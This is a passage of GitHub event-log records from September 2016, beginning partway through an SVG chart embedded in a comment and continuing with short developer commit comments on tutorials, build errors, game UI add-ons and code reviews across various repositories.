transform=\"translate(27,0)\" style=\"stroke-width: 1px; font-size: 10px; font-family: Arial, Helvetica;\"><g class=\"tick\" transform=\"translate(0,460)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">0</text></g><g class=\"tick\" transform=\"translate(0,416)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">10</text></g><g class=\"tick\" transform=\"translate(0,372)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">20</text></g><g class=\"tick\" transform=\"translate(0,328)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">30</text></g><g class=\"tick\" transform=\"translate(0,284)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">40</text></g><g class=\"tick\" transform=\"translate(0,240)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">50</text></g><g class=\"tick\" transform=\"translate(0,196)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">60</text></g><g class=\"tick\" transform=\"translate(0,151.99999999999994)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">70</text></g><g class=\"tick\" transform=\"translate(0,108)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">80</text></g><g class=\"tick\" transform=\"translate(0,64)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">90</text></g><g class=\"tick\" transform=\"translate(0,20)\" style=\"opacity: 1;\"><line x2=\"800\" y2=\"0\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></line><text x=\"-3\" y=\"0\" dy=\".32em\" style=\"text-anchor: end;\">100</text></g><path class=\"domain\" d=\"M800,20H0V460H800\" style=\"shape-rendering: crispEdges; fill: none; stroke: rgb(204, 204, 204);\"></path></g><g class=\"circle\"><circle transform=\"translate(474.61904761904765,460)\" r=\"20\" style=\"fill: rgb(191, 105, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(474.61904761904765,460)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(36.523809523809526,460)\" r=\"20\" style=\"fill: rgb(191, 127, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(36.523809523809526,460)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(207.95238095238093,306)\" r=\"20\" style=\"fill: rgb(191, 150, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(207.95238095238093,306)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(150.8095238095238,398.4)\" r=\"20\" style=\"fill: rgb(191, 172, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(150.8095238095238,398.4)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(122.23809523809523,138.8)\" r=\"20\" style=\"fill: rgb(187, 191, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(122.23809523809523,138.8)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(122.23809523809523,420.4)\" r=\"20\" style=\"fill: rgb(165, 191, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(122.23809523809523,420.4)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(160.33333333333331,402.8)\" r=\"20\" style=\"fill: rgb(142, 191, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(160.33333333333331,402.8)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(236.5238095238095,363.2)\" r=\"20\" style=\"fill: rgb(120, 191, 105); fill-opacity: 0.9;\"></circle><text transform=\"translate(236.5238095238095,363.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(646.047619047619,341.2)\" r=\"20\" style=\"fill: rgb(105, 191, 113); fill-opacity: 0.9;\"></circle><text transform=\"translate(646.047619047619,341.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(188.9047619047619,314.79999999999995)\" r=\"20\" style=\"fill: rgb(105, 191, 135); fill-opacity: 0.9;\"></circle><text transform=\"translate(188.9047619047619,314.79999999999995)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(27,20)\" r=\"20\" style=\"fill: rgb(105, 191, 157); fill-opacity: 0.9;\"></circle><text transform=\"translate(27,20)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(74.61904761904762,314.79999999999995)\" r=\"20\" style=\"fill: rgb(105, 191, 180); fill-opacity: 0.9;\"></circle><text transform=\"translate(74.61904761904762,314.79999999999995)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(541.2857142857142,292.8)\" r=\"20\" style=\"fill: rgb(105, 180, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(541.2857142857142,292.8)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(512.7142857142857,358.8)\" r=\"20\" style=\"fill: rgb(105, 157, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(512.7142857142857,358.8)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(350.8095238095238,297.2)\" r=\"20\" style=\"fill: rgb(105, 135, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(350.8095238095238,297.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(65.0952380952381,284)\" r=\"20\" style=\"fill: rgb(105, 113, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(65.0952380952381,284)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(217.47619047619045,187.2)\" r=\"20\" style=\"fill: rgb(120, 105, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(217.47619047619045,187.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(36.523809523809526,460)\" r=\"20\" style=\"fill: rgb(142, 105, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(36.523809523809526,460)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(103.19047619047619,363.2)\" r=\"20\" style=\"fill: rgb(165, 105, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(103.19047619047619,363.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(46.04761904761905,460)\" r=\"20\" style=\"fill: rgb(187, 105, 191); fill-opacity: 0.9;\"></circle><text transform=\"translate(46.04761904761905,460)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(74.61904761904762,385.2)\" r=\"20\" style=\"fill: rgb(191, 105, 172); fill-opacity: 0.9;\"></circle><text transform=\"translate(74.61904761904762,385.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(827,341.2)\" r=\"20\" style=\"fill: rgb(191, 105, 150); fill-opacity: 0.9;\"></circle><text transform=\"translate(827,341.2)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"circle\"><circle transform=\"translate(207.95238095238093,460)\" r=\"20\" style=\"fill: rgb(191, 105, 127); fill-opacity: 0.9;\"></circle><text transform=\"translate(207.95238095238093,460)\" text-anchor=\"middle\" dy=\"15\" style=\"font-size: 10px; font-family: Arial, Helvetica;\"></text></g><g class=\"point\"><circle transform=\"translate(474.61904761904765,460)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(36.523809523809526,460)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(207.95238095238093,306)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(150.8095238095238,398.4)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(122.23809523809523,138.8)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(122.23809523809523,420.4)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(160.33333333333331,402.8)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(236.5238095238095,363.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(646.047619047619,341.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(188.9047619047619,314.79999999999995)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(27,20)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(74.61904761904762,314.79999999999995)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(541.2857142857142,292.8)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(512.7142857142857,358.8)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(350.8095238095238,297.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(65.0952380952381,284)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(217.47619047619045,187.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(36.523809523809526,460)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(103.19047619047619,363.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(46.04761904761905,460)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(74.61904761904762,385.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(827,341.2)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g><g class=\"point\"><circle transform=\"translate(207.95238095238093,460)\" r=\"1\" style=\"fill: rgb(0, 0, 0);\"></circle></g></g></svg>\r\n`"}},"created_at":"2016-09-05T00:04:50Z"}
{"id":"4514614812","type":"CommitCommentEvent","actor":{"login":"theEdwardJC"},"repo":{"name":"theEdwardJC/aima-python"},"payload":{"comment":{"id":18894619,"position":null,"line":null,"path":null,"commit_id":"983e98fd6c0ffe6e313397d065f2a3af771bec6b","created_at":"2016-09-05T00:05:32Z","updated_at":"2016-09-05T00:05:32Z","body":"I dug deeper and will reimplement vacuum 2 and the runner."}},"created_at":"2016-09-05T00:05:32Z"}
{"id":"4514621804","type":"CommitCommentEvent","actor":{"login":"tmeasday"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":18894621,"position":null,"line":null,"path":null,"commit_id":"8cb48d9c1280f5feda7aff06c385a52dedad832d","created_at":"2016-09-05T00:11:35Z","updated_at":"2016-09-05T00:11:35Z","body":"@lindybrandon, yes, this step doesn't work on it's own (we should probably fix that!) -- you'll need to do up to at least 7.3 before it will run."}},"created_at":"2016-09-05T00:11:35Z"}
{"id":"4514623023","type":"CommitCommentEvent","actor":{"login":"tmeasday"},"repo":{"name":"meteor/simple-todos-react"},"payload":{"comment":{"id":18894622,"position":5,"line":22,"path":"imports/ui/App.jsx","commit_id":"4c5eed813149be7a6bdb999406fbb3d1d1f7fe5b","created_at":"2016-09-05T00:12:37Z","updated_at":"2016-09-05T00:12:37Z","body":"@Spacey-Facey I'm not sure what you mean?"}},"created_at":"2016-09-05T00:12:37Z"}
{"id":"4514627379","type":"CommitCommentEvent","actor":{"login":"tmeasday"},"repo":{"name":"meteor/simple-todos"},"payload":{"comment":{"id":18894626,"position":null,"line":null,"path":null,"commit_id":"23156828acfc00fbcc682d6ab2212b18f85ff660","created_at":"2016-09-05T00:16:25Z","updated_at":"2016-09-05T00:16:25Z","body":"@jfkquality do you mean the closing brace for line 25? It's on line 38."}},"created_at":"2016-09-05T00:16:25Z"}
{"id":"4514628408","type":"CommitCommentEvent","actor":{"login":"lyh1628"},"repo":{"name":"lyh1628/Hello-world"},"payload":{"comment":{"id":18894628,"position":3,"line":3,"path":"README.md","commit_id":"921bf3e3bcca20a9730f87c6c940713673167eae","created_at":"2016-09-05T00:17:13Z","updated_at":"2016-09-05T00:17:13Z","body":"고멘트."}},"created_at":"2016-09-05T00:17:13Z"}
{"id":"4514628507","type":"CommitCommentEvent","actor":{"login":"lyh1628"},"repo":{"name":"lyh1628/Hello-world"},"payload":{"comment":{"id":18894629,"position":3,"line":3,"path":"README.md","commit_id":"921bf3e3bcca20a9730f87c6c940713673167eae","created_at":"2016-09-05T00:17:18Z","updated_at":"2016-09-05T00:17:18Z","body":"123"}},"created_at":"2016-09-05T00:17:18Z"}
{"id":"4514629869","type":"CommitCommentEvent","actor":{"login":"Apollyonn"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":18894633,"position":null,"line":null,"path":null,"commit_id":"4d27add16806bdbc4ad6be0c35367652a0af8c9a","created_at":"2016-09-05T00:18:21Z","updated_at":"2016-09-05T00:18:21Z","body":"Man you are a God.\r\nSo far everything seems to be working fine! Vehicle/stance paging & cooldowns works\r\n"}},"created_at":"2016-09-05T00:18:21Z"}
{"id":"4514632477","type":"CommitCommentEvent","actor":{"login":"ryanwilliams83"},"repo":{"name":"ergovia-mobile/android-transcoder"},"payload":{"comment":{"id":18894636,"position":null,"line":null,"path":null,"commit_id":"615042896833aaab7fa6f0be19d582fca6291eca","created_at":"2016-09-05T00:20:32Z","updated_at":"2016-09-05T00:20:32Z","body":"On the Samsung Galaxy Camera 2 we encountered an issue with the cordova-file-transfer plugin timing out approximately 50% of the time when uploading videos that had been recorded using the cordova-media-capture plugin and then re-encoded using the android-transcoder.\n\nOur code was initiating the upload in the successCallback of the android transcoder.\n\n \n\nAfter debugging the issue we discovered that by closing the android transcoder output stream before raising its success callback the issue went away.\n\nWe only experienced the issue on the Samsung Galaxy Camera 2 and I suspect that it has a single core CPU.\n\n \n\nWarm Regards\n\nRyan Williams\n\n \n\nFrom: Yuya Tanaka [mailto:notifications@github.com] \nSent: Saturday, 3 September 2016 18:59\nTo: ergovia-mobile/android-transcoder\nCc: Ryan Williams; Mention\nSubject: Re: [ergovia-mobile/android-transcoder] Close stream before calling listener events (6150428)\n\n \n\n@ryanwilliams83 <https://github.com/ryanwilliams83>  Could you tell me detail of the issue..?\n\n—\nYou are receiving this because you were mentioned.\nReply to this email directly, view it on GitHub <https://github.com/ergovia-mobile/android-transcoder/commit/615042896833aaab7fa6f0be19d582fca6291eca#commitcomment-18889387> , or mute the thread <https://github.com/notifications/unsubscribe-auth/ADsSGF1FZoDs6CqODCfeD27skDf-CQA1ks5qmTa3gaJpZM4JZOKS> .  <https://github.com/notifications/beacon/ADsSGFOvHgk7Kmpt5Ha9N2OOrRY_BzI5ks5qmTa3gaJpZM4JZOKS.gif> \n\n"}},"created_at":"2016-09-05T00:20:32Z"}
{"id":"4514637483","type":"CommitCommentEvent","actor":{"login":"teobguan2016"},"repo":{"name":"teobguan2016/mySecondRepo"},"payload":{"comment":{"id":18894648,"position":7,"line":7,"path":"test.html","commit_id":"c6aaeadfa65a8b459d6f8562343ba7a7f9072710","created_at":"2016-09-05T00:24:51Z","updated_at":"2016-09-05T00:24:51Z","body":"This is correct"}},"created_at":"2016-09-05T00:24:51Z"}
{"id":"4514638270","type":"CommitCommentEvent","actor":{"login":"teobguan2016"},"repo":{"name":"teobguan2016/mySecondRepo"},"payload":{"comment":{"id":18894650,"position":4,"line":4,"path":"test.html","commit_id":"c6aaeadfa65a8b459d6f8562343ba7a7f9072710","created_at":"2016-09-05T00:25:30Z","updated_at":"2016-09-05T00:25:30Z","body":"The button name should be changed."}},"created_at":"2016-09-05T00:25:30Z"}
{"id":"4514638327","type":"CommitCommentEvent","actor":{"login":"l-d-s"},"repo":{"name":"Gabriel439/post-rfc"},"payload":{"comment":{"id":18894651,"position":null,"line":null,"path":null,"commit_id":"2dd4bd60163292974513e494eedbbcc2989014ab","created_at":"2016-09-05T00:25:33Z","updated_at":"2016-09-05T00:25:33Z","body":"This seems a bit too generous to me. I certainly don't think Haskell data science is suitable for \"most programmers\". Interfaces to other language's ecosystems don't themselves constitute a mature ecosystem; Haskell is way behind R or Python for routine data-analytical tasks."}},"created_at":"2016-09-05T00:25:33Z"}
{"id":"4514638592","type":"CommitCommentEvent","actor":{"login":"teobguan2016"},"repo":{"name":"teobguan2016/mySecondRepo"},"payload":{"comment":{"id":18894653,"position":4,"line":4,"path":"test.html","commit_id":"c6aaeadfa65a8b459d6f8562343ba7a7f9072710","created_at":"2016-09-05T00:25:45Z","updated_at":"2016-09-05T00:25:45Z","body":"test"}},"created_at":"2016-09-05T00:25:45Z"}
{"id":"4514640307","type":"CommitCommentEvent","actor":{"login":"teresathen"},"repo":{"name":"KristineWolf/Eventastic"},"payload":{"comment":{"id":18894655,"position":null,"line":null,"path":null,"commit_id":"c089d4145814fe27fec46b4940f2b724ecc425a6","created_at":"2016-09-05T00:27:12Z","updated_at":"2016-09-05T00:27:12Z","body":"ich werde pro Activity 4 Layout-xmls erstellen.\r\n- xlarge screens: 960dp x 720dp \r\n- large screens: 640dp x 480dp\r\n- normal screens 470dp x 320dp\r\n- small screens 426dp x 320dp\r\n\r\nIch denke das ist ausreichend, habe ich so in diversen Foren im Internet gefunden. Was meinst du?"}},"created_at":"2016-09-05T00:27:12Z"}
{"id":"4514640410","type":"CommitCommentEvent","actor":{"login":"zzjjzzgggg"},"repo":{"name":"syl20bnr/spacemacs"},"payload":{"comment":{"id":18894656,"position":null,"line":null,"path":null,"commit_id":"55accac7e53066026cbe9a006e1e9c3663c39628","created_at":"2016-09-05T00:27:17Z","updated_at":"2016-09-05T00:27:17Z","body":"Can I have an option to hide such information \"266 packages loaded in 23.489s\" at startup?"}},"created_at":"2016-09-05T00:27:17Z"}
{"id":"4514641111","type":"CommitCommentEvent","actor":{"login":"silky"},"repo":{"name":"Gabriel439/post-rfc"},"payload":{"comment":{"id":18894657,"position":null,"line":null,"path":null,"commit_id":"2dd4bd60163292974513e494eedbbcc2989014ab","created_at":"2016-09-05T00:27:53Z","updated_at":"2016-09-05T00:27:53Z","body":"yeah, i basically agree; i'd still consider it immature; i think there are but a handful of people actually using haskell for data science seriously."}},"created_at":"2016-09-05T00:27:53Z"}
{"id":"4514642833","type":"CommitCommentEvent","actor":{"login":"ryukinix"},"repo":{"name":"ryukinix/dotfiles"},"payload":{"comment":{"id":18894659,"position":null,"line":null,"path":null,"commit_id":"128a08b1a8851c5a8fc8152a68c07bbd85443ccb","created_at":"2016-09-05T00:29:15Z","updated_at":"2016-09-05T00:29:15Z","body":"Is everything ok now. After all, was my choice \"steal\" your files."}},"created_at":"2016-09-05T00:29:15Z"}
{"id":"4514647185","type":"CommitCommentEvent","actor":{"login":"mpilosov"},"repo":{"name":"mpilosov/M5660-Repo"},"payload":{"comment":{"id":18894666,"position":null,"line":null,"path":null,"commit_id":"8436829ab9e28a4fbebe4fef617e3c051d1b6338","created_at":"2016-09-05T00:32:09Z","updated_at":"2016-09-05T00:32:09Z","body":"@variscarey could you please check out this file? Is this what is supposed to happen?\r\n"}},"created_at":"2016-09-05T00:32:09Z"}
{"id":"4514649175","type":"CommitCommentEvent","actor":{"login":"mpilosov"},"repo":{"name":"mpilosov/M5660-Repo"},"payload":{"comment":{"id":18894668,"position":null,"line":null,"path":null,"commit_id":"8436829ab9e28a4fbebe4fef617e3c051d1b6338","created_at":"2016-09-05T00:33:35Z","updated_at":"2016-09-05T00:33:35Z","body":"also I'm not entirely sure how to get your attention about a file on github without commenting on the commit. so please direct me to whatever's best to accomplish sharing code I'm unsure about. Perhaps an email with a link to the file would be preferable? "}},"created_at":"2016-09-05T00:33:35Z"}
{"id":"4514650641","type":"CommitCommentEvent","actor":{"login":"weiyuzhu"},"repo":{"name":"cretueusebiu/laravel-web-push-demo"},"payload":{"comment":{"id":18894669,"position":null,"line":null,"path":null,"commit_id":"c455d56b90f8737c6b851b36fb35d8f91fc53d72","created_at":"2016-09-05T00:34:47Z","updated_at":"2016-09-05T00:34:47Z","body":" Problem 1\r\n    - mdanter/ecc v0.4.0 requires ext-gmp * -> the requested PHP extension gmp is missing from your system.\r\n    - laravel-notification-channels/webpush dev-master requires minishlink/web-push ^1.1 -> satisfiable by minishlink/web-push[v1.1].\r\n    - minishlink/web-push v1.1 requires mdanter/ecc ^0.4.0 -> satisfiable by mdanter/ecc[v0.4.0].\r\n    - Installation request for laravel-notification-channels/webpush dev-master -> satisfiable by laravel-notification-channels/webpush[dev-master].\r\n\r\n  To enable extensions, verify that they are enabled in those .ini files:\r\n    - D:\\phpStudy\\php70n\\php.ini\r\n  You can also run `php --ini` inside terminal to see which files are used by PHP in CLI mode.\r\n"}},"created_at":"2016-09-05T00:34:47Z"}
{"id":"4514651542","type":"CommitCommentEvent","actor":{"login":"yunsup"},"repo":{"name":"ucb-bar/rocket-chip"},"payload":{"comment":{"id":18894672,"position":null,"line":null,"path":null,"commit_id":"f34843f1b9f567caca4b213a7541b225c6bbb169","created_at":"2016-09-05T00:35:25Z","updated_at":"2016-09-05T00:35:25Z","body":"Oh, my bad.  Now I understand what you're doing."}},"created_at":"2016-09-05T00:35:25Z"}
{"id":"4514652730","type":"CommitCommentEvent","actor":{"login":"crumdidlyumshis"},"repo":{"name":"ElvUI-WotLK/ElvUI"},"payload":{"comment":{"id":18894674,"position":null,"line":null,"path":null,"commit_id":"4d27add16806bdbc4ad6be0c35367652a0af8c9a","created_at":"2016-09-05T00:36:27Z","updated_at":"2016-09-05T00:36:27Z","body":"He is indeed a God! So are you @Apollyonn :)\r\n\r\nOnly issue I found so far was Bar 6 options are non-existent and some of the stance switching is using different bars in clone copy ways."}},"created_at":"2016-09-05T00:36:27Z"}
{"id":"4514653456","type":"CommitCommentEvent","actor":{"login":"k-okada"},"repo":{"name":"start-jsk/rtmros_common"},"payload":{"comment":{"id":18894675,"position":231,"line":231,"path":"hrpsys_ros_bridge/src/HrpsysJointTrajectoryBridge.cpp","commit_id":"a49042b567b92884062da88f287e2f71c061321e","created_at":"2016-09-05T00:37:05Z","updated_at":"2016-09-05T00:37:05Z","body":"@YoheiKakiuchi @mmurooka \r\nこれ　`#if 0` している理由はあるのかな？\r\nあまりpubilshしたくない？"}},"created_at":"2016-09-05T00:37:05Z"}
{"id":"4514653623","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18894677,"position":null,"line":null,"path":null,"commit_id":"6b18f946fdfce1bf12590db6b2e56b079f0c018b","created_at":"2016-09-05T00:37:13Z","updated_at":"2016-09-05T00:37:13Z","body":"Yes @Dreameeer The comments have been added please check my Neptron-patch and review it. Thankyou."}},"created_at":"2016-09-05T00:37:13Z"}
{"id":"4514654469","type":"CommitCommentEvent","actor":{"login":"coleifer"},"repo":{"name":"keredson/peewee"},"payload":{"comment":{"id":18894679,"position":5,"line":1602,"path":"peewee.py","commit_id":"37395179301291253addb7c7b62ae776574f852a","created_at":"2016-09-05T00:37:50Z","updated_at":"2016-09-05T00:37:50Z","body":"FWIW, I've merged an equivalent change. Commit is dcd87f74521afb45cdf0763e5662dae75f005e94"}},"created_at":"2016-09-05T00:37:50Z"}
{"id":"4514655726","type":"CommitCommentEvent","actor":{"login":"Neptron101"},"repo":{"name":"Neptron101/csuteam10"},"payload":{"comment":{"id":18894688,"position":null,"line":null,"path":null,"commit_id":"18fb8cfe5d74c8cfdd79e69434f9147a1521fc25","created_at":"2016-09-05T00:38:54Z","updated_at":"2016-09-05T00:38:54Z","body":"The comments have been added to Neptron-patch @Dreameeer . Please do check it. I still have to merge it with the master. I will do so after you have reviewed my  code and approved it. Thankyou."}},"created_at":"2016-09-05T00:38:54Z"}
{"id":"4514658423","type":"CommitCommentEvent","actor":{"login":"ahoereth"},"repo":{"name":"zhukov/webogram"},"payload":{"comment":{"id":18894699,"position":5,"line":127,"path":"gulpfile.js","commit_id":"c9049fb91ffb88e7aeb5bf8ceb39335a3e6fe3f8","created_at":"2016-09-05T00:40:59Z","updated_at":"2016-09-05T00:40:59Z","body":"@zhukov How did it come to the decision to remove the webapp `manifest.json` from the appcache? Could not find anything online regarding whether to add or not to add it. Thanks!"}},"created_at":"2016-09-05T00:40:59Z"}
{"id":"4514659632","type":"CommitCommentEvent","actor":{"login":"bhollis"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18894701,"position":null,"line":null,"path":null,"commit_id":"c36aac9eaa3455a9b842d0b55b56b3d2d90e2cd7","created_at":"2016-09-05T00:41:52Z","updated_at":"2016-09-05T00:41:52Z","body":"Oh, bummer. I didn't think it required a permissions dialog just to change the CSP. I'm also confused as to why the `if (ga)` tests ended up causing problems..."}},"created_at":"2016-09-05T00:41:52Z"}
{"id":"4514660582","type":"CommitCommentEvent","actor":{"login":"lucabrivio"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":18894706,"position":null,"line":null,"path":null,"commit_id":"d6b4dea7cb3cc15383ff02310ab166825ae69285","created_at":"2016-09-05T00:42:29Z","updated_at":"2016-09-05T00:42:29Z","body":"By the way you run a loop for each single pawn... maybe my algorithm was actually faster?"}},"created_at":"2016-09-05T00:42:29Z"}
{"id":"4514660680","type":"CommitCommentEvent","actor":{"login":"connorshea"},"repo":{"name":"danger/danger"},"payload":{"comment":{"id":18894707,"position":12,"line":131,"path":"lib/danger/danger_core/plugins/dangerfile_gitlab_plugin.rb","commit_id":"580ce6b91f05c1289648c597d5ab8e73eda62929","created_at":"2016-09-05T00:42:33Z","updated_at":"2016-09-05T00:42:33Z","body":"We need a linter for this I guess :P"}},"created_at":"2016-09-05T00:42:33Z"}
{"id":"4514662527","type":"CommitCommentEvent","actor":{"login":"SunburnedGoose"},"repo":{"name":"DestinyItemManager/DIM"},"payload":{"comment":{"id":18894711,"position":null,"line":null,"path":null,"commit_id":"c36aac9eaa3455a9b842d0b55b56b3d2d90e2cd7","created_at":"2016-09-05T00:43:59Z","updated_at":"2016-09-05T00:43:59Z","body":"When testing like that, you need an object to reference.  Testing `if (window.ga)` would have been successful."}},"created_at":"2016-09-05T00:43:59Z"}
